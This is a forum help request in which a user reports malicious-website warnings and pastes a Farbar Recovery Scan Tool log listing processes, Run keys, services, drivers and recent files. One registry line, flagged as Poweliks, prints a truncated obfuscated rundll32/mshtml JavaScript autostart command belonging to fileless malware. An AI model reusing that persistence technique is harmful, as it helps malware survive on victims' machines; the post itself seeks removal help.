
Many "Malicious Website Blocked" Messages



Happy New Year,

I have been getting a lot of "Malicious Website Blocked".

I have downloaded and executed FRST and have included the content of the FRST.TXT and ADDITION.TXT files.

Any and all help will be greatly appreciated.

Thanks,

Randy


Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 01-01-2015
Ran by Randy (administrator) on RANDY-BEBO on 01-01-2015 17:47:53
Running from C:\Users\Randy\Desktop
Loaded Profile: Randy (Available profiles: Randy & JThakur & VMcGlynn)
Platform: Microsoft Windows 7 Ultimate  Service Pack 1 (X86) OS Language: English (United States)
Internet Explorer Version 11 (Default browser: IE)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AMD) C:\Windows\System32\atiesrxx.exe
(Creative Technology Ltd) C:\Program Files\Creative\Shared Files\CTAudSvc.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Wave Systems Corp.) C:\Program Files\Wave Systems Corp\Trusted Drive Manager\TdmService.exe
(American Power Conversion Corporation) C:\Program Files\APC\APC PowerChute Personal Edition\mainserv.exe
(Dell Inc.) C:\Program Files\Dell Printers\Additional Color Laser Software\Status Monitor\dlsdbnt.exe
(Malwarebytes Corporation) C:\Program Files\Malwarebytes Anti-Malware\mbamscheduler.exe
(Malwarebytes Corporation) C:\Program Files\Malwarebytes Anti-Malware\mbamservice.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\100\DTS\Binn\MsDtsSrvr.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\sqlservr.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\MSAS10_50.MSSQLSERVER\OLAP\bin\msmdsrv.exe
(Trend Micro Inc.) C:\Program Files\Trend Micro\Client Server Security Agent\NTRtScan.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\MSRS10_50.MSSQLSERVER\Reporting Services\ReportServer\bin\ReportingServicesService.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlbrowser.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
(Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVC.EXE
(American Power Conversion Corporation) C:\Program Files\APC\APC PowerChute Personal Edition\dataserv.exe
(Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVCM.EXE
(Microsoft Corporation) C:\Windows\System32\wbem\unsecapp.exe
(Dell Inc.) C:\Program Files\Dell\Dell System Manager\DCPSysMgrSvc.exe
(Dell Inc.) C:\Program Files\Dell Printers\Additional Color Laser Software\Status Monitor\dlpwdnt.exe
(Intel Corporation) C:\Program Files\Intel\Intel Matrix Storage Manager\IAANTmon.exe
(Trend Micro Inc.) C:\Program Files\Trend Micro\Client Server Security Agent\HostedAgent\svcGenericHost.exe
(Trend Micro Inc.) C:\Program Files\Trend Micro\Client Server Security Agent\TmListen.exe
(Trend Micro Inc.) C:\Program Files\Trend Micro\Client Server Security Agent\HostedAgent\HostedAgent.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\fdlauncher.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\fdhost.exe
() C:\Program Files\Trend Micro\BM\TMBMSRV.exe
(Trend Micro Inc.) C:\Program Files\Trend Micro\Client Server Security Agent\TmProxy.exe
(Intuit Inc.) C:\Program Files\Common Files\Intuit\Update Service\IntuitUpdateService.exe
(Intuit Inc.) C:\Program Files\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
(Malwarebytes Corporation) C:\Program Files\Malwarebytes Anti-Malware\mbam.exe
(Intel Corporation) C:\Program Files\Intel\Intel Matrix Storage Manager\IAAnotif.exe
(Creative Technology Ltd) C:\Program Files\Creative\Sound Blaster X-Fi\Volume Panel\VolPanlu.exe
(Wave Systems Corp.) C:\Program Files\Wave Systems Corp\Services Manager\DocMgr\bin\WavXDocMgr.exe
(Broadcom Corporation) C:\Program Files\Dell\Dell ControlPoint\Security Manager\BcmDeviceAndTaskStatusService.exe
(CyberLink Corp.) C:\Program Files\CyberLink\PowerDVD9\PDVD9Serv.exe
(Trend Micro Inc.) C:\Program Files\Trend Micro\Client Server Security Agent\PccNTMon.exe
(Analog Devices, Inc.) C:\Program Files\Analog Devices\Core\smax4pnp.exe
(Advanced Micro Devices Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(Creative Technology Ltd) C:\Windows\System32\Ctxfihlp.exe
(SEIKO EPSON CORPORATION) C:\Program Files\Epson Software\Event Manager\EEventManager.exe
(Dell Inc.) C:\Program Files\Dell Printers\Additional Color Laser Software\Status Monitor\dlpsp.exe
(Creative Technology Ltd) C:\Windows\System32\CTxfispi.exe
(Dell Inc.) C:\Program Files\Dell Printers\Additional Color Laser Software\Updater\dlupdr.exe
() C:\Program Files\Roxio\OEM\Roxio Burn\RoxioBurnLauncher.exe
(Microsoft Corporation) C:\Program Files\Microsoft Device Center\itype.exe
(Microsoft Corporation) C:\Program Files\Microsoft Device Center\ipoint.exe
(Oracle Corporation) C:\Program Files\Common Files\Java\Java Update\jusched.exe
(Garmin Ltd or its subsidiaries) C:\Program Files\Garmin\Express Tray\ExpressTray.exe
(Dell Inc.) C:\Program Files\Dell\Dell System Manager\DCPSysMgr.exe
(ATI Technologies Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Wave Systems Corp.) C:\Program Files\Wave Systems Corp\Trusted Drive Manager\TdmNotify.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Garmin Ltd or its subsidiaries) C:\Program Files\Garmin\Core Update Service\Garmin.Cartography.MapUpdate.CoreService.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe

==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [ATIModeChange] => Ati2mdxx.exe
HKLM\...\Run: [iAAnotif] => C:\Program Files\Intel\Intel Matrix Storage Manager\iaanotif.exe [186904 2009-08-07] (Intel Corporation)
HKLM\...\Run: [VolPanel] => C:\Program Files\Creative\Sound Blaster X-Fi\Volume Panel\VolPanlu.exe [241789 2009-04-09] (Creative Technology Ltd)
HKLM\...\Run: [updReg] => C:\Windows\UpdReg.EXE [90112 2000-05-11] (Creative Technology Ltd.)
HKLM\...\Run: [startCCC] => c:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [98304 2010-01-27] (Advanced Micro Devices, Inc.)
HKLM\...\Run: [WavXMgr] => C:\Program Files\Wave Systems Corp\Services Manager\Docmgr\bin\WavXDocMgr.exe [147840 2010-07-21] (Wave Systems Corp.)
HKLM\...\Run: [uSCService] => C:\Program Files\Dell\Dell ControlPoint\Security Manager\BcmDeviceAndTaskStatusService.exe [34232 2010-06-22] (Broadcom Corporation)
HKLM\...\Run: [RemoteControl9] => C:\Program Files\CyberLink\PowerDVD9\PDVD9Serv.exe [87336 2009-07-06] (CyberLink Corp.)
HKLM\...\Run: [PDVD9LanguageShortcut] => C:\Program Files\CyberLink\PowerDVD9\Language\Language.exe [50472 2010-04-29] (CyberLink Corp.)
HKLM\...\Run: [] => [X]
HKLM\...\Run: [RoxWatchTray] => C:\Program Files\Common Files\Roxio Shared\OEM\12.0\SharedCOM\RoxWatchTray12OEM.exe [240112 2010-09-04] (Sonic Solutions)
HKLM\...\Run: [OfficeScanNT Monitor] => c:\Program Files\Trend Micro\Client Server Security Agent\pccntmon.exe [1956400 2014-03-18] (Trend Micro Inc.)
HKLM\...\Run: [soundMAXPnP] => C:\Program Files\Analog Devices\Core\smax4pnp.exe [1314816 2009-04-23] (Analog Devices, Inc.)
HKLM\...\Run: [Display] => C:\Program Files\APC\APC PowerChute Personal Edition\DataCollectionLauncher.exe [271736 2010-09-14] (American Power Conversion Corporation)
HKLM\...\Run: [CTxfiHlp] => CTXFIHLP.EXE
HKLM\...\Run: [EEventManager] => C:\Program Files\Epson Software\Event Manager\EEventManager.exe [673616 2009-04-07] (SEIKO EPSON CORPORATION)
HKLM\...\Run: [OE] => c:\Program Files\Trend Micro\Client Server Security Agent\TMAS_OE\TMAS_OEMon.exe [492880 2010-08-10] (Trend Micro Inc.)
HKLM\...\Run: [DLPSP] => C:\Program Files\Dell Printers\Additional Color Laser Software\Status Monitor\DLPSP.EXE [886152 2010-06-01] (Dell Inc.)
HKLM\...\Run: [DLUPDR] => C:\Program Files\Dell Printers\Additional Color Laser Software\Updater\DLUPDR.EXE [566680 2010-06-01] (Dell Inc.)
HKLM\...\Run: [DLQLU] => C:\Program Files\Dell Printers\Additional Color Laser Software\Launcher\DLQLU.EXE [1127744 2010-06-01] (Dell Inc.)
HKLM\...\Run: [Desktop Disc Tool] => C:\Program Files\Roxio\oem\Roxio Burn\RoxioBurnLauncher.exe [522736 2010-11-01] ()
HKLM\...\Run: [Adobe ARM] => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1022152 2014-12-19] (Adobe Systems Incorporated)
HKLM\...\Run: [intelliType Pro] => c:\Program Files\Microsoft Device Center\itype.exe [1109072 2012-06-26] (Microsoft Corporation)
HKLM\...\Run: [intelliPoint] => c:\Program Files\Microsoft Device Center\ipoint.exe [1629280 2012-06-26] (Microsoft Corporation)
HKLM\...\Run: [sunJavaUpdateSched] => C:\Program Files\Common Files\Java\Java Update\jusched.exe [256896 2014-07-25] (Oracle Corporation)
Winlogon\Notify\GoToAssist: C:\Program Files\Citrix\GoToAssist\514\G2AWinLogon.dll [X]
HKU\S-1-5-21-756768628-1363961526-1356878247-1000\...\Run: [GarminExpressTrayApp] => C:\Program Files\Garmin\Express Tray\ExpressTray.exe [688984 2014-07-23] (Garmin Ltd or its subsidiaries)
HKU\S-1-5-21-756768628-1363961526-1356878247-1000\...\RunOnce: [FlashPlayerUpdate] => C:\Windows\system32\Macromed\Flash\FlashUtil32_15_0_0_246_ActiveX.exe [855216 2014-12-09] (Adobe Systems Incorporated)
HKU\S-1-5-21-756768628-1363961526-1356878247-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
HKU\S-1-5-18\...\Run: [GarminExpressTrayApp] => C:\Program Files\Garmin\Express Tray\ExpressTray.exe [688984 2014-07-23] (Garmin Ltd or its subsidiaries)
Lsa: [Authentication Packages] msv1_0 wvauth
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\APC UPS Status.lnk
ShortcutTarget: APC UPS Status.lnk -> C:\Program Files\APC\APC PowerChute Personal Edition\Display.exe (American Power Conversion Corporation)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Dell System Manager.lnk
ShortcutTarget: Dell System Manager.lnk -> C:\Program Files\Dell\Dell System Manager\DCPSysMgr.exe (Dell Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\TdmNotify.lnk
ShortcutTarget: TdmNotify.lnk -> C:\Program Files\Wave Systems Corp\Trusted Drive Manager\TdmNotify.exe (Wave Systems Corp.)
ShellIconOverlayIdentifiers: [EnabledUnlockedFDEIconOverlay] -> {30D3C2AF-9709-4D05-9CF4-13335F3C1E4A} => C:\Program Files\Wave Systems Corp\Trusted Drive Manager\TdmIconOverlay.dll (Wave Systems Corp.)
ShellIconOverlayIdentifiers: [uninitializedFdeIconOverlay] -> {CF08DA3E-C97D-4891-A66B-E39B28DD270F} => C:\Program Files\Wave Systems Corp\Trusted Drive Manager\TdmIconOverlay.dll (Wave Systems Corp.)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKU\S-1-5-21-756768628-1363961526-1356878247-1000\Software\Microsoft\Internet Explorer\Main,Start Page = http://g.msn.com/USREL/1
HKU\S-1-5-21-756768628-1363961526-1356878247-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://g.msn.com/USREL/1
SearchScopes: HKLM -> DefaultScope {269CF376-E79D-4EC0-A165-B4AF1E0E7C91} URL = http://www.bing.com/search?q={searchTerms}&form=DLRDF8&pc=MDDR&src=IE-SearchBox
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM -> {269CF376-E79D-4EC0-A165-B4AF1E0E7C91} URL = http://www.bing.com/search?q={searchTerms}&form=DLRDF8&pc=MDDR&src=IE-SearchBox
SearchScopes: HKU\S-1-5-21-756768628-1363961526-1356878247-1000 -> DefaultScope {269CF376-E79D-4EC0-A165-B4AF1E0E7C91} URL =
SearchScopes: HKU\S-1-5-21-756768628-1363961526-1356878247-1000 -> {269CF376-E79D-4EC0-A165-B4AF1E0E7C91} URL =
SearchScopes: HKU\S-1-5-21-756768628-1363961526-1356878247-1000 -> {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL =
BHO: TmIEPlugInBHO Class -> {1CA1377B-DC1D-4A52-9585-6E06050FAC53} -> c:\Program Files\Trend Micro\Client Server Security Agent\bho\1084\TmIEPlg.dll (Trend Micro Inc.)
BHO: Java Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Windows Live Messenger Companion Helper -> {9FDDE16B-836F-4806-AB1F-1455CBEFF289} -> C:\Program Files\Windows Live\Companion\companioncore.dll (Microsoft Corporation)
BHO: WinZip Courier BHO -> {A8FB70FA-0FDF-4601-9DC4-BFA1B357204F} -> C:\Program Files\WinZip Courier\wzwmcie.dll (WinZip Computing, S.L.)
BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
BHO: Java Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
Toolbar: HKU\S-1-5-21-756768628-1363961526-1356878247-1000 -> Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
DPF: {02BCC737-B171-4746-94C9-0D8A0B2C0089} http://office.microsoft.com/sites/production/ieawsdc32.cab
DPF: {166B1BCA-3F9C-11CF-8075-444553540000} http://download.macromedia.com/pub/shockwave/cabs/director/sw.cab
DPF: {17492023-C23A-453E-A040-C7C580BBF700} http://download.microsoft.com/download/E/5/6/E5611B10-0D6D-4117-8430-A67417AA88CD/LegitCheckControl.cab
DPF: {233C1507-6A77-46A4-9443-F871F945D258} http://download.macromedia.com/pub/shockwave/cabs/director/sw.cab
DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
Handler: tmpx - {0E526CB5-7446-41D1-A403-19BFE95E8C23} - c:\Program Files\Trend Micro\Client Server Security Agent\bho\1084\TmIEPlg.dll (Trend Micro Inc.)
Tcpip\Parameters: [DhcpNameServer] 192.168.1.254

FireFox:
========
FF Plugin: @adobe.com/ShockwavePlayer -> C:\Windows\system32\Adobe\Director\np32dsw_1205146.dll (Adobe Systems, Inc.)
FF Plugin: @java.com/DTPlugin,version=10.67.2 -> C:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=10.67.2 -> C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin: @microsoft.com/GENUINE -> C:\Windows\system32\Wat\npWatWeb.dll (Microsoft Corporation)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.20913.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin: @microsoft.com/WLPG,version=15.4.3508.1109 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF HKLM\...\Firefox\Extensions: [{22C7F6C6-8D67-4534-92B5-529A0EC09405}] - c:\Program Files\Trend Micro\Client Server Security Agent\bho\1084\FirefoxExtension
FF Extension: Trend Micro NSC Firefox Extension - c:\Program Files\Trend Micro\Client Server Security Agent\bho\1084\FirefoxExtension [2014-08-17]

Chrome:
=======
CHR StartupUrls: Default -> "hxxp://www.google.com/"
CHR Plugin: (Shockwave Flash) - C:\Program Files\Google\Chrome\Application\39.0.2171.71\PepperFlash\pepflashplayer.dll ()
CHR Plugin: (Chrome Remote Desktop Viewer) - internal-remoting-viewer
CHR Plugin: (Native Client) - C:\Program Files\Google\Chrome\Application\39.0.2171.71\ppGoogleNaClPluginChrome.dll No File
CHR Plugin: (Chrome PDF Viewer) - C:\Program Files\Google\Chrome\Application\39.0.2171.71\pdf.dll ()
CHR Plugin: (Adobe Acrobat) - C:\Program Files\Adobe\Reader 10.0\Reader\Browser\nppdf32.dll (Adobe Systems Inc.)
CHR Plugin: (Google Update) - C:\Program Files\Google\Update\1.3.21.123\npGoogleUpdate3.dll No File
CHR Plugin: (Java Platform SE 6 U35) - C:\Program Files\Java\jre6\bin\plugin2\npjp2.dll No File
CHR Plugin: (Windows Live Photo Gallery) - C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
CHR Plugin: (Shockwave for Director) - C:\Windows\system32\Adobe\Director\np32dsw_1168638.dll No File
CHR Plugin: (Windows Activation Technologies) - C:\Windows\system32\Wat\npWatWeb.dll (Microsoft Corporation)
CHR Plugin: (Java Deployment Toolkit 6.0.350.10) - C:\Windows\system32\npdeployJava1.dll No File
CHR Plugin: (Silverlight Plug-In) - c:\Program Files\Microsoft Silverlight\5.1.10411.0\npctrl.dll No File
CHR Profile: C:\Users\Randy\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\Randy\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-11-07]
CHR Extension: (Google Wallet) - C:\Users\Randy\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-10-10]

========================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 APC Data Service; C:\Program Files\APC\APC PowerChute Personal Edition\dataserv.exe [21880 2010-09-14] (American Power Conversion Corporation)
R2 APC UPS Service; C:\Program Files\APC\APC PowerChute Personal Edition\mainserv.exe [705912 2010-09-14] (American Power Conversion Corporation)
S3 Creative ALchemy AL6 Licensing Service; C:\Program Files\Common Files\Creative Labs Shared\Service\AL6Licensing.exe [79360 2011-01-19] (Creative Labs) [File not signed]
S3 Creative Audio Engine Licensing Service; C:\Program Files\Common Files\Creative Labs Shared\Service\CTAELicensing.exe [79360 2011-01-19] (Creative Labs) [File not signed]
R2 CTAudSvcService; C:\Program Files\Creative\Shared Files\CTAudSvc.exe [286720 2010-02-12] (Creative Technology Ltd) [File not signed]
R2 dcpsysmgrsvc; c:\Program Files\Dell\Dell System Manager\DCPSysMgrSvc.exe [388464 2010-08-24] (Dell Inc.)
R2 Garmin Core Update Service; C:\Program Files\Garmin\Core Update Service\Garmin.Cartography.MapUpdate.CoreService.exe [438616 2014-07-23] (Garmin Ltd or its subsidiaries)
R2 MBAMScheduler; C:\Program Files\Malwarebytes Anti-Malware\mbamscheduler.exe [1871160 2014-11-21] (Malwarebytes Corporation)
R2 MBAMService; C:\Program Files\Malwarebytes Anti-Malware\mbamservice.exe [969016 2014-11-21] (Malwarebytes Corporation)
R2 MsDtsServer100; C:\Program Files\Microsoft SQL Server\100\DTS\Binn\MsDtsSrvr.exe [214880 2011-04-24] (Microsoft Corporation)
R3 MSSQLFDLauncher; C:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\fdlauncher.exe [28512 2010-04-03] (Microsoft Corporation)
R2 MSSQLSERVER; C:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe [42872672 2011-04-24] (Microsoft Corporation)
R2 MSSQLServerOLAPService; C:\Program Files\Microsoft SQL Server\MSAS10_50.MSSQLSERVER\OLAP\bin\msmdsrv.exe [25768800 2010-04-03] (Microsoft Corporation)
R2 ntrtscan; c:\Program Files\Trend Micro\Client Server Security Agent\ntrtscan.exe [1300440 2014-06-23] (Trend Micro Inc.)
R2 ReportServer; C:\Program Files\Microsoft SQL Server\MSRS10_50.MSSQLSERVER\Reporting Services\ReportServer\bin\ReportingServicesService.exe [1177952 2011-04-24] (Microsoft Corporation)
S3 RoxMediaDB12OEM; C:\Program Files\Common Files\Roxio Shared\OEM\12.0\SharedCOM\RoxMediaDB12OEM.exe [1116656 2010-09-04] (Sonic Solutions)
S2 RoxWatch12; C:\Program Files\Common Files\Roxio Shared\OEM\12.0\SharedCOM\RoxWatch12OEM.exe [219632 2010-09-04] (Sonic Solutions)
S3 SecureStorageService; C:\Program Files\Wave Systems Corp\Secure Storage Manager\SecureStorageService.exe [1032192 2010-02-03] (Wave Systems Corp.) [File not signed]
S3 SQLSERVERAGENT; C:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\SQLAGENT.EXE [367456 2011-04-24] (Microsoft Corporation)
R2 svcGenericHost; c:\Program Files\Trend Micro\Client Server Security Agent\HostedAgent\svcGenericHost.exe [51760 2014-03-31] (Trend Micro Inc.)
S2 tcsd_win32.exe; C:\Program Files\NTRU Cryptosystems\NTRU TCG Software Stack\bin\tcsd_win32.exe [1273856 2008-11-12] () [File not signed]
R2 TdmService; C:\Program Files\Wave Systems Corp\Trusted Drive Manager\TdmService.exe [1164648 2010-03-29] (Wave Systems Corp.)
R3 TMBMServer; c:\Program Files\Trend Micro\BM\TMBMSRV.exe [345112 2013-10-23] () [File not signed]
R2 tmlisten; c:\Program Files\Trend Micro\Client Server Security Agent\tmlisten.exe [1487128 2014-07-23] (Trend Micro Inc.)
R3 TmProxy; c:\Program Files\Trend Micro\Client Server Security Agent\TmProxy.exe [693272 2013-10-14] (Trend Micro Inc.)

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R3 amdkmdag; C:\Windows\System32\DRIVERS\atipmdag.sys [5295616 2010-01-28] (ATI Technologies Inc.)
S3 Blfp; C:\Windows\System32\DRIVERS\basp.sys [86016 2010-02-10] (Broadcom Corporation)
R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [23256 2014-11-21] (Malwarebytes Corporation)
R3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [114904 2014-12-30] (Malwarebytes Corporation)
R3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [51928 2014-11-21] (Malwarebytes Corporation)
S3 MWAC; \??\C:\Windows\system32\drivers\ [0 ] () [File not signed]
R0 PBADRV; C:\Windows\System32\DRIVERS\PBADRV.sys [26608 2008-06-04] (Dell Inc)
S4 RsFx0150; C:\Windows\System32\DRIVERS\RsFx0150.sys [240608 2010-04-03] (Microsoft Corporation)
R3 tmactmon; C:\Windows\System32\DRIVERS\tmactmon.sys [75600 2013-08-29] () [File not signed]
R2 tmcomm; C:\Windows\System32\DRIVERS\tmcomm.sys [263072 2013-09-02] () [File not signed]
R3 tmevtmgr; C:\Windows\System32\DRIVERS\tmevtmgr.sys [62704 2013-08-29] () [File not signed]
R2 TmFilter; c:\Program Files\Trend Micro\Client Server Security Agent\TmXPFlt.sys [263968 2013-08-14] (Trend Micro Inc.)
R2 TmPreFilter; c:\Program Files\Trend Micro\Client Server Security Agent\TmPreFlt.sys [36128 2013-08-14] (Trend Micro Inc.)
R1 tmtdi; C:\Windows\System32\DRIVERS\tmtdi.sys [90712 2013-01-09] (Trend Micro Inc.)
R3 vpcbus; C:\Windows\System32\DRIVERS\vpchbus.sys [172416 2010-11-20] (Microsoft Corporation)
R1 vpcnfltr; C:\Windows\System32\DRIVERS\vpcnfltr.sys [48128 2010-11-20] (Microsoft Corporation)
R3 vpcusb; C:\Windows\System32\DRIVERS\vpcusb.sys [78336 2010-11-20] (Microsoft Corporation)
R1 vpcvmm; C:\Windows\System32\drivers\vpcvmm.sys [296064 2010-11-20] (Microsoft Corporation)
R2 VSApiNt; c:\Program Files\Trend Micro\Client Server Security Agent\VSApiNt.sys [1517600 2013-08-14] (Trend Micro Inc.)
R2 WavxDMgr; C:\Windows\System32\DRIVERS\WavxDMgr.sys [229888 2010-01-19] (Wave Systems Corp.) [File not signed]
S3 Synth3dVsc; System32\drivers\synth3dvsc.sys [X]
U3 tmpfw; No ImagePath
S3 tsusbhub; system32\drivers\tsusbhub.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)

==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-12-20 15:55 - 2014-12-20 15:55 - 16448208 _____ (Malwarebytes Corp.) C:\Users\Randy\Downloads\mbar-1.08.2.1001.exe
2014-12-15 21:56 - 2015-01-01 17:47 - 00024391 _____ () C:\Users\Randy\Desktop\FRST.txt
2014-12-15 21:55 - 2015-01-01 17:44 - 00000000 ____D () C:\Users\Randy\Desktop\FRST-OlderVersion

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2015-01-01 17:47 - 2014-11-16 11:10 - 00000000 ____D () C:\FRST
2015-01-01 17:44 - 2014-11-16 16:13 - 01114624 _____ (Farbar) C:\Users\Randy\Desktop\FRST.exe
2015-01-01 17:30 - 2011-03-22 18:30 - 00000886 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2015-01-01 16:57 - 2012-05-01 09:40 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2015-01-01 16:49 - 2011-03-22 18:30 - 00000882 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2015-01-01 16:41 - 2009-07-13 23:39 - 00511428 _____ () C:\Windows\setupact.log
2015-01-01 16:40 - 2009-07-13 23:55 - 01806021 _____ () C:\Windows\WindowsUpdate.log
2014-12-30 20:42 - 2014-06-16 19:21 - 00114904 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamswissarmy.sys
2014-12-29 22:32 - 2009-07-13 23:34 - 00014224 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-12-29 22:32 - 2009-07-13 23:34 - 00014224 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-12-26 20:33 - 2011-11-12 11:52 - 00002441 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader X.lnk
2014-12-26 20:32 - 2011-11-12 11:52 - 00000000 ____D () C:\Program Files\Common Files\Adobe
2014-12-26 18:47 - 2011-01-30 21:40 - 00000000 _____ () C:\Users\Randy\AppData\Local\WavXMapDrive.bat
2014-12-26 18:36 - 2009-07-13 23:53 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-12-20 15:56 - 2014-11-16 11:32 - 00000000 ____D () C:\Users\Randy\Desktop\mbar
2014-12-20 15:56 - 2014-06-16 19:18 - 00079576 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-12-14 22:36 - 2011-04-01 15:49 - 00020480 _____ () C:\Users\Randy\Documents\Finance.xlsx
2014-12-14 21:43 - 2011-01-19 18:43 - 00000000 ____D () C:\ProgramData\Sonic
2014-12-14 21:40 - 2012-10-26 12:04 - 00000000 ____D () C:\Users\Randy\Documents\BigbeeCustomSoftware
2014-12-12 17:33 - 2012-11-15 11:52 - 00002131 _____ () C:\Users\Public\Desktop\Google Chrome.lnk
2014-12-09 23:03 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\NDF
